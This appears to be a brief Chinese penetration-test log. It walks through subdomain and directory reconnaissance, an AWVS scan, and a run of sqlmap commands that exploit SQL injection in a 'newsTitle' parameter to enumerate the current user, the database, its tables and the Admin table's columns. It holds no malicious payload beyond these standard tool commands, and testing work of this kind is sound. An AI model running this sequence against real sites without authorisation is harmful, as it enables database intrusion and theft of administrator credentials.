记渗透

                                                                         渗透记录

1.

信息收集：

子域名**，通过Layer**子域名

御剑扫描目录信息：

扫描到敏感路径，发现有信息泄露:

写脚本扫描泄露的信息，收集泄露的子域名信息，

2.扫描漏洞

在wvs中，添加收集到的目标，并对其新建扫描

扫描结果：

查看扫描详细信息，并且记录下http请求包，放到文件1.txt中，启动sqlmap，

扫描记录下的文件，扫描其中的http请求

sqlmap -r /opt/1.txt 
扫描可能有漏洞的指定参数

sqlmap -r /opt/1.txt  -p newsTitle

发现为sqlserver，看是否有sa权限

sqlmap -r /opt/1.txt  -p newsTitle --current-user

跑数据库

sqlmap -r /opt/1.txt  -p newsTitle --current-db

跑表

sqlmap -r /opt/1.txt  -p newsTitle -D 'xxxx' --tables

表详细信息，列名

sqlmap -r /opt/1.txt  -p newsTitle -D 'xxxx' -T Admin --columns

得到结果后，扫描后台路径，验证数据